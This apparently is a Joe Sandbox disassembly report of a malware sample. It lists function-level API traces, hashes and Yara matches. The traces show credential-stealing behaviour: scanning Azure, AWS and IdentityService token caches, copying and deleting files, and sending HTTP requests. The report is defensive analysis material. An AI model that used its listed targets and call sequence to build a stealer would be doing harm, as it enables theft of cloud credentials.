API String ID: 2228671196-0
Opcode ID: ac139bb6a41cab49a6932678af24aaf2570856b08b0e100686c08f01b86293e7
Instruction ID: da956b8b4be6e00df949d6296c80974674053bdcb2efcea9ad8590b0dd67d36f
Opcode Fuzzy Hash: ac139bb6a41cab49a6932678af24aaf2570856b08b0e100686c08f01b86293e7
Instruction Fuzzy Hash: 460262B190024CFBCB14EBA4DC9ADFE7339AF14301F504159F64AA21A1DF78AE05DB66

Function 0040A6C0 Relevance: 32.0, APIs: 21, Instructions: 494stringmemoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A440: StrCmpCA.SHLWAPI(00000000,00421414,0040CFE2,00421414,00000000), ref: 0041A45F

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040A9F2
HeapAlloc.KERNEL32(00000000), ref: 0040A9F9
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040A7DA

Part of subcall function 0041A1F0: lstrlenA.KERNEL32(00000000,?,?,00415634,00420AC3,00420AC2,?,?,004165B6,00000000,?,00845518,?,004210DC,?,00000000), ref: 0041A1FB
Part of subcall function 0041A1F0: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A255

Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2

Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5

lstrcat.KERNEL32(?,00000000), ref: 0040AB3A
lstrcat.KERNEL32(?,004212C4), ref: 0040AB49
lstrcat.KERNEL32(?,00000000), ref: 0040AB5C
lstrcat.KERNEL32(?,004212C8), ref: 0040AB6B
lstrcat.KERNEL32(?,00000000), ref: 0040AB7E
lstrcat.KERNEL32(?,004212CC), ref: 0040AB8D
lstrcat.KERNEL32(?,00000000), ref: 0040ABA0
lstrcat.KERNEL32(?,004212D0), ref: 0040ABAF
lstrcat.KERNEL32(?,00000000), ref: 0040ABC2
lstrcat.KERNEL32(?,004212D4), ref: 0040ABD1
lstrcat.KERNEL32(?,00000000), ref: 0040ABE4
lstrcat.KERNEL32(?,004212D8), ref: 0040ABF3

Part of subcall function 00409E60: memcmp.MSVCRT ref: 00409E7B
Part of subcall function 00409E60: memset.MSVCRT ref: 00409EAE
Part of subcall function 00409E60: LocalAlloc.KERNEL32(00000040,?), ref: 00409EFE

lstrcat.KERNEL32(?,00000000), ref: 0040AC3C
lstrcat.KERNEL32(?,004212DC), ref: 0040AC56
lstrlenA.KERNEL32(?), ref: 0040AC95
lstrlenA.KERNEL32(?), ref: 0040ACA4
memset.MSVCRT ref: 0040ACF3

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

DeleteFileA.KERNEL32(00000000), ref: 0040AD1F

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: lstrcat$lstrcpylstrlen$AllocFileHeapmemset$CopyDeleteLocalProcessmemcmp
String ID:
API String ID: 1525483061-0
Opcode ID: 58a26333c5610f5fc9907ecd5352a2386ef7133abe3ac7825ea27d1ebca9a7fe
Instruction ID: db3bf564d8a269597709baab17c241dc92c2864a2a44399f5d1cb95b81495e87
Opcode Fuzzy Hash: 58a26333c5610f5fc9907ecd5352a2386ef7133abe3ac7825ea27d1ebca9a7fe
Instruction Fuzzy Hash: 13029371901108ABCB14EBA1DC96EEE7339BF54314F10416EF507B20A1DF786E99CB6A

Function 007ECF97 Relevance: 31.9, APIs: 21, Instructions: 374stringmemoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 007FA377: lstrcpy.KERNEL32(00420DFF,00000000), ref: 007FA3BF

Part of subcall function 007FA5E7: lstrlen.KERNEL32(?,0062C9F0,?,00424EAC,00420DFF), ref: 007FA5FC
Part of subcall function 007FA5E7: lstrcpy.KERNEL32(00000000), ref: 007FA63B
Part of subcall function 007FA5E7: lstrcat.KERNEL32(00000000,00000000), ref: 007FA649

Part of subcall function 007FA4D7: lstrcpy.KERNEL32(?,00420DFF), ref: 007FA53C

Part of subcall function 007F8867: GetSystemTime.KERNEL32(00420E02,0062CAA4,0042059E,?,?,007E1660,?,0000001A,00420E02,00000000,?,0062C9F0,?,00424EAC,00420DFF), ref: 007F888D

Part of subcall function 007FA557: lstrcpy.KERNEL32(00000000,?), ref: 007FA5A9
Part of subcall function 007FA557: lstrcat.KERNEL32(00000000), ref: 007FA5B9

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 007ED02A
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 007ED16E
RtlAllocateHeap.NTDLL(00000000), ref: 007ED175
lstrcat.KERNEL32(?,00000000), ref: 007ED2AF
lstrcat.KERNEL32(?,0042141C), ref: 007ED2BE
lstrcat.KERNEL32(?,00000000), ref: 007ED2D1
lstrcat.KERNEL32(?,00421420), ref: 007ED2E0
lstrcat.KERNEL32(?,00000000), ref: 007ED2F3
lstrcat.KERNEL32(?,00421424), ref: 007ED302
lstrcat.KERNEL32(?,00000000), ref: 007ED315
lstrcat.KERNEL32(?,00421428), ref: 007ED324
lstrcat.KERNEL32(?,00000000), ref: 007ED337
lstrcat.KERNEL32(?,0042142C), ref: 007ED346
lstrcat.KERNEL32(?,00000000), ref: 007ED359
lstrcat.KERNEL32(?,00421430), ref: 007ED368
lstrcat.KERNEL32(?,00000000), ref: 007ED37B
lstrcat.KERNEL32(?,00421434), ref: 007ED38A

Part of subcall function 007FA457: lstrlen.KERNEL32(007E51BC,?,?,007E51BC,00420DC6), ref: 007FA462
Part of subcall function 007FA457: lstrcpy.KERNEL32(00420DC6,00000000), ref: 007FA4BC

lstrlen.KERNEL32(?), ref: 007ED3D1
lstrlen.KERNEL32(?), ref: 007ED3E0
memset.MSVCRT ref: 007ED42F

Part of subcall function 007FA6A7: StrCmpCA.SHLWAPI(0062CB50,007EA93E,?,007EA93E,0062CB50), ref: 007FA6C6

DeleteFileA.KERNEL32(00000000), ref: 007ED45B

Memory Dump Source

Source File: 00000003.00000002.1459848007.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7e0000_169F.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
String ID:
API String ID: 1973479514-0
Opcode ID: 1f5f7aa509843ef1aa3c752ffe22aa0b3a88711838e3ad08d0d01edb4937e0e8
Instruction ID: 0557f0d1dc0cb5fd51a28e76dd2259b3313420e4dedbb8acec1923674daca28c
Opcode Fuzzy Hash: 1f5f7aa509843ef1aa3c752ffe22aa0b3a88711838e3ad08d0d01edb4937e0e8
Instruction Fuzzy Hash: D9E15FB190024CEBCB14EBA4DC9ADFE7739AF14300F504158F60AA71A1DF78AE05DB66

Function 0040CD30 Relevance: 31.9, APIs: 21, Instructions: 374stringmemoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2

Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5

Part of subcall function 00418600: GetSystemTime.KERNEL32(?,008499C8,0042059E,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418626

Part of subcall function 0041A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0041A342
Part of subcall function 0041A2F0: lstrcat.KERNEL32(00000000), ref: 0041A352

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040CDC3
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040CF07
HeapAlloc.KERNEL32(00000000), ref: 0040CF0E
lstrcat.KERNEL32(?,00000000), ref: 0040D048
lstrcat.KERNEL32(?,0042141C), ref: 0040D057
lstrcat.KERNEL32(?,00000000), ref: 0040D06A
lstrcat.KERNEL32(?,00421420), ref: 0040D079
lstrcat.KERNEL32(?,00000000), ref: 0040D08C
lstrcat.KERNEL32(?,00421424), ref: 0040D09B
lstrcat.KERNEL32(?,00000000), ref: 0040D0AE
lstrcat.KERNEL32(?,00421428), ref: 0040D0BD
lstrcat.KERNEL32(?,00000000), ref: 0040D0D0
lstrcat.KERNEL32(?,0042142C), ref: 0040D0DF
lstrcat.KERNEL32(?,00000000), ref: 0040D0F2
lstrcat.KERNEL32(?,00421430), ref: 0040D101
lstrcat.KERNEL32(?,00000000), ref: 0040D114
lstrcat.KERNEL32(?,00421434), ref: 0040D123

Part of subcall function 0041A1F0: lstrlenA.KERNEL32(00000000,?,?,00415634,00420AC3,00420AC2,?,?,004165B6,00000000,?,00845518,?,004210DC,?,00000000), ref: 0041A1FB
Part of subcall function 0041A1F0: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A255

lstrlenA.KERNEL32(?), ref: 0040D16A
lstrlenA.KERNEL32(?), ref: 0040D179
memset.MSVCRT ref: 0040D1C8

Part of subcall function 0041A440: StrCmpCA.SHLWAPI(00000000,00421414,0040CFE2,00421414,00000000), ref: 0041A45F

DeleteFileA.KERNEL32(00000000), ref: 0040D1F4

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocCopyDeleteProcessSystemTimememset
String ID:
API String ID: 2775534915-0
Opcode ID: 62b6da4721f56a0a4127d7daaedb7376f3a9132a987c7ec3e1fcd3d1e1d41d4c
Instruction ID: ed6c437cbd46477d92e2fdf931dfcacd4144c719bc88927133304dc8b30d11c2
Opcode Fuzzy Hash: 62b6da4721f56a0a4127d7daaedb7376f3a9132a987c7ec3e1fcd3d1e1d41d4c
Instruction Fuzzy Hash: 25E1A271901108ABCB14EBA0DC9AEEE7339AF54314F50415EF507B30A1DF786E99CB6A

Function 00414850 Relevance: 30.1, APIs: 10, Strings: 10, Instructions: 119stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00414867

Part of subcall function 00418880: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 004188AB

lstrcat.KERNEL32(?,00000000), ref: 00414890
lstrcat.KERNEL32(?,\.azure\), ref: 004148AD

Part of subcall function 004143F0: wsprintfA.USER32 ref: 0041440C
Part of subcall function 004143F0: FindFirstFileA.KERNEL32(?,?), ref: 00414423

memset.MSVCRT ref: 004148F3
lstrcat.KERNEL32(?,00000000), ref: 0041491C
lstrcat.KERNEL32(?,\.aws\), ref: 00414939

Part of subcall function 004143F0: StrCmpCA.SHLWAPI(?,00420FAC), ref: 00414451
Part of subcall function 004143F0: StrCmpCA.SHLWAPI(?,00420FB0), ref: 00414467
Part of subcall function 004143F0: FindNextFileA.KERNEL32(000000FF,?), ref: 0041465D
Part of subcall function 004143F0: FindClose.KERNEL32(000000FF), ref: 00414672

memset.MSVCRT ref: 0041497F
lstrcat.KERNEL32(?,00000000), ref: 004149A8
lstrcat.KERNEL32(?,\.IdentityService\), ref: 004149C5

Part of subcall function 004143F0: wsprintfA.USER32 ref: 00414490
Part of subcall function 004143F0: StrCmpCA.SHLWAPI(?,004208BA), ref: 004144A5
Part of subcall function 004143F0: wsprintfA.USER32 ref: 004144C2
Part of subcall function 004143F0: PathMatchSpecA.SHLWAPI(?,?), ref: 004144FE
Part of subcall function 004143F0: lstrcat.KERNEL32(?,0084D670), ref: 0041452A
Part of subcall function 004143F0: lstrcat.KERNEL32(?,00420FC8), ref: 0041453C
Part of subcall function 004143F0: lstrcat.KERNEL32(?,?), ref: 00414550
Part of subcall function 004143F0: lstrcat.KERNEL32(?,00420FCC), ref: 00414562
Part of subcall function 004143F0: lstrcat.KERNEL32(?,?), ref: 00414576
Part of subcall function 004143F0: CopyFileA.KERNEL32(?,?,00000001), ref: 0041458C
Part of subcall function 004143F0: DeleteFileA.KERNEL32(?), ref: 00414611

memset.MSVCRT ref: 00414A0B

Strings

\.azure\, xrefs: 004148A1
msal.cache, xrefs: 004149D0
*.*, xrefs: 00414944
Azure\.IdentityService, xrefs: 004149CB
Azure\.aws, xrefs: 0041493F
Z\A, xrefs: 004148D1, 0041495D, 004149E9, 00414A14, 004148D4, 00414960, 004149EC
*.*, xrefs: 004148B8
\.IdentityService\, xrefs: 004149B9
\.aws\, xrefs: 0041492D
Azure\.azure, xrefs: 004148B3

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$Z\A$\.IdentityService\$\.aws\$\.azure\$msal.cache
API String ID: 4017274736-156850865
Opcode ID: df6c696880e7715a67ca0b89a81cdfd34e7cd8e5791ff1f7689e855706e63aa0
Instruction ID: 646ecaa1659512b06866923d8f1ff883aab6ee332b32f164b7e7d78f354b44b8
Opcode Fuzzy Hash: df6c696880e7715a67ca0b89a81cdfd34e7cd8e5791ff1f7689e855706e63aa0
Instruction Fuzzy Hash: C741FC75A4021867CB20F760EC4BFDD773C5B54704F404459B64AA60D2EEFC57C98BAA

Function 007E5C17 Relevance: 29.0, APIs: 19, Instructions: 493networkstringmemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 007FA3D7: lstrcpy.KERNEL32(?,00000000), ref: 007FA41D

Part of subcall function 007E4A67: ??2@YAPAXI@Z.MSVCRT ref: 007E4AA1
Part of subcall function 007E4A67: ??2@YAPAXI@Z.MSVCRT ref: 007E4AB8
Part of subcall function 007E4A67: ??2@YAPAXI@Z.MSVCRT ref: 007E4ACF
Part of subcall function 007E4A67: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 007E4AF0
Part of subcall function 007E4A67: InternetCrackUrlA.WININET(00000000,00000000), ref: 007E4B00

Part of subcall function 007FA377: lstrcpy.KERNEL32(00420DFF,00000000), ref: 007FA3BF

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 007E5CAF
StrCmpCA.SHLWAPI(?,0062CC80), ref: 007E5CCA
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 007E5E4A
lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,004219C4,00000000,?,0062C8F0,00000000,?,0062CAF0,00000000,?,004219C0), ref: 007E6128
lstrlen.KERNEL32(00000000), ref: 007E6139
GetProcessHeap.KERNEL32(00000000,?), ref: 007E614A
RtlAllocateHeap.NTDLL(00000000), ref: 007E6151
lstrlen.KERNEL32(00000000), ref: 007E6166
memcpy.MSVCRT ref: 007E617D
lstrlen.KERNEL32(00000000), ref: 007E618F
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 007E61A8
memcpy.MSVCRT ref: 007E61B5
lstrlen.KERNEL32(00000000,?,?), ref: 007E61D2
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 007E61E6
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 007E6203
InternetCloseHandle.WININET(00000000), ref: 007E6267
InternetCloseHandle.WININET(00000000), ref: 007E6274
HttpOpenRequestA.WININET(00000000,0062CC9C,?,0062CAB4,00000000,00000000,00400100,00000000), ref: 007E5EAF

Part of subcall function 007FA5E7: lstrlen.KERNEL32(?,0062C9F0,?,00424EAC,00420DFF), ref: 007FA5FC
Part of subcall function 007FA5E7: lstrcpy.KERNEL32(00000000), ref: 007FA63B
Part of subcall function 007FA5E7: lstrcat.KERNEL32(00000000,00000000), ref: 007FA649

Part of subcall function 007FA4D7: lstrcpy.KERNEL32(?,00420DFF), ref: 007FA53C

Part of subcall function 007FA557: lstrcpy.KERNEL32(00000000,?), ref: 007FA5A9
Part of subcall function 007FA557: lstrcat.KERNEL32(00000000), ref: 007FA5B9

InternetCloseHandle.WININET(00000000), ref: 007E627E

Memory Dump Source

Source File: 00000003.00000002.1459848007.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7e0000_169F.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocateConnectCrackFileProcessReadSend
String ID:
API String ID: 1703137719-0
Opcode ID: 3e1440209c087ff31953979c28784c29d8c2925b1651cedeae16df319fdac404
Instruction ID: 059aebb7f2cf493e8dc3a089ac54dd0409c8978ecf9274800ad45dbf53e29d0d
Opcode Fuzzy Hash: 3e1440209c087ff31953979c28784c29d8c2925b1651cedeae16df319fdac404
Instruction Fuzzy Hash: 2C121AB191026CEBCB15EBA4DC99FFEB338BF24700F404199B20A62191DF782B49DB55

Function 007ECA37 Relevance: 26.6, APIs: 14, Strings: 1, Instructions: 383filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 007FA377: lstrcpy.KERNEL32(00420DFF,00000000), ref: 007FA3BF

Part of subcall function 007FA557: lstrcpy.KERNEL32(00000000,?), ref: 007FA5A9
Part of subcall function 007FA557: lstrcat.KERNEL32(00000000), ref: 007FA5B9

Part of subcall function 007FA4D7: lstrcpy.KERNEL32(?,00420DFF), ref: 007FA53C

Part of subcall function 007FA5E7: lstrlen.KERNEL32(?,0062C9F0,?,00424EAC,00420DFF), ref: 007FA5FC
Part of subcall function 007FA5E7: lstrcpy.KERNEL32(00000000), ref: 007FA63B
Part of subcall function 007FA5E7: lstrcat.KERNEL32(00000000,00000000), ref: 007FA649

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0062CE3C,00000000,?,004213F0,00000000,?,?), ref: 007ECB13
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 007ECB30
GetFileSize.KERNEL32(00000000,00000000), ref: 007ECB3C
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 007ECB4F
??2@YAPAXI@Z.MSVCRT ref: 007ECB5C
ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 007ECB80
StrStrA.SHLWAPI(?,0062C9B0,00420B37), ref: 007ECB9E
StrStrA.SHLWAPI(00000000,0062CB64), ref: 007ECBC5
StrStrA.SHLWAPI(?,0062CCD0,00000000,?,004213FC,00000000,?,00000000,00000000,?,0062C95C,00000000,?,004213F8,00000000,?), ref: 007ECD49
StrStrA.SHLWAPI(00000000,0062CCCC), ref: 007ECD60

Part of subcall function 007EC8C7: memset.MSVCRT ref: 007EC8FA
Part of subcall function 007EC8C7: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 007EC918
Part of subcall function 007EC8C7: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 007EC923
Part of subcall function 007EC8C7: memcpy.MSVCRT ref: 007EC9B9

StrStrA.SHLWAPI(?,0062CCCC,00000000,?,00421400,00000000,?,00000000,0062C8DC), ref: 007ECE01
StrStrA.SHLWAPI(00000000,0062CDA8), ref: 007ECE18

Part of subcall function 007EC8C7: lstrcat.KERNEL32(?,00420B2E), ref: 007EC9EA
Part of subcall function 007EC8C7: lstrcat.KERNEL32(?,00420B2F), ref: 007EC9FE
Part of subcall function 007EC8C7: lstrcat.KERNEL32(?,00420B33), ref: 007ECA1F

lstrlen.KERNEL32(00000000), ref: 007ECEEB
CloseHandle.KERNEL32(00000000), ref: 007ECF43

Strings

, xrefs: 007ECA6D

Memory Dump Source

Source File: 00000003.00000002.1459848007.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7e0000_169F.jbxd

Yara matches

Similarity

API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$??2@BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
String ID:
API String ID: 3555725114-3916222277
Opcode ID: 420aa5e6f71c04385c8ea579292e72c5b106bdd7428a8cf078187b31c7a3a888
Instruction ID: bb8dfd9a002180477bbc70fcbdf5b6e9c871f51ed86b0cd74a89a0b3c6f96f2b
Opcode Fuzzy Hash: 420aa5e6f71c04385c8ea579292e72c5b106bdd7428a8cf078187b31c7a3a888
Instruction Fuzzy Hash: 2CE14DB180024CFBCB15EBA4DC99EFEB779AF14300F404159F24A63291DF786A49DB65

Function 0040C7D0 Relevance: 26.6, APIs: 14, Strings: 1, Instructions: 383filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

Part of subcall function 0041A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0041A342
Part of subcall function 0041A2F0: lstrcat.KERNEL32(00000000), ref: 0041A352

Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5

Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0087B2B8,00000000,?,004213F0,00000000,?,?), ref: 0040C8AC
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040C8C9
GetFileSize.KERNEL32(00000000,00000000), ref: 0040C8D5
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040C8E8
??2@YAPAXI@Z.MSVCRT ref: 0040C8F5
ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040C919
StrStrA.SHLWAPI(?,0087B108,00420B37), ref: 0040C937
StrStrA.SHLWAPI(00000000,0087B150), ref: 0040C95E
StrStrA.SHLWAPI(?,0087BC08,00000000,?,004213FC,00000000,?,00000000,00000000,?,0084D540,00000000,?,004213F8,00000000,?), ref: 0040CAE2
StrStrA.SHLWAPI(00000000,0087B9E8), ref: 0040CAF9

Part of subcall function 0040C660: memset.MSVCRT ref: 0040C693
Part of subcall function 0040C660: lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,0084D470), ref: 0040C6B1
Part of subcall function 0040C660: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C6BC
Part of subcall function 0040C660: memcpy.MSVCRT ref: 0040C752

StrStrA.SHLWAPI(?,0087B9E8,00000000,?,00421400,00000000,?,00000000,0084D470), ref: 0040CB9A
StrStrA.SHLWAPI(00000000,0084D6E0), ref: 0040CBB1

Part of subcall function 0040C660: lstrcat.KERNEL32(?,00420B2E), ref: 0040C783
Part of subcall function 0040C660: lstrcat.KERNEL32(?,00420B2F), ref: 0040C797
Part of subcall function 0040C660: lstrcat.KERNEL32(?,00420B33), ref: 0040C7B8

lstrlenA.KERNEL32(00000000), ref: 0040CC84
CloseHandle.KERNEL32(00000000), ref: 0040CCDC

Strings

, xrefs: 0040C806

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$??2@BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
String ID:
API String ID: 3555725114-3916222277
Opcode ID: c56c95ee8fc255ff8a6412a8165efca7feb98ad45975a0e4d1963d275f686dda
Instruction ID: 91e77cebffad47ece097f7429d4e9b812732713b5b21c7dde3d323aaba1c439f
Opcode Fuzzy Hash: c56c95ee8fc255ff8a6412a8165efca7feb98ad45975a0e4d1963d275f686dda
Instruction Fuzzy Hash: 15E18E71801108ABCB14EBA1DC96FEEB739AF14314F00415EF40773191EF786A99CBAA

Function 00417DC0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

RegOpenKeyExA.ADVAPI32(00000000,0084AA68,00000000,00020019,00000000,004205A6), ref: 00417E44
RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00417EC6
wsprintfA.USER32 ref: 00417EF9
RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00417F1B
RegCloseKey.ADVAPI32(00000000), ref: 00417F2C
RegCloseKey.ADVAPI32(00000000), ref: 00417F39

Part of subcall function 0041A170: lstrcpy.KERNEL32(?,00000000), ref: 0041A1B6

Strings

%s\%s, xrefs: 00417EED
- , xrefs: 00418043
?, xrefs: 00417E1A

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: CloseOpenlstrcpy$Enumwsprintf
String ID: - $%s\%s$?
API String ID: 3246050789-3278919252
Opcode ID: 6add8a66113190d9645630c8cd0e807f0befeaf7487910556c68bd84216a3432
Instruction ID: 7e933c005afce5063b6ac28d37290dd0de40035e7daa9b78ce1efab2f7c43410
Opcode Fuzzy Hash: 6add8a66113190d9645630c8cd0e807f0befeaf7487910556c68bd84216a3432
Instruction Fuzzy Hash: 3581197191111CABDB28DB54CC85FEAB7B9BF08314F0082D9E10AA6190DF756BC9CFA5

Function 00410DE0 Relevance: 19.8, APIs: 13, Instructions: 308stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 00410E17
strtok_s.MSVCRT ref: 00411260

Part of subcall function 0041A1F0: lstrlenA.KERNEL32(00000000,?,?,00415634,00420AC3,00420AC2,?,?,004165B6,00000000,?,00845518,?,004210DC,?,00000000), ref: 0041A1FB
Part of subcall function 0041A1F0: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A255

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

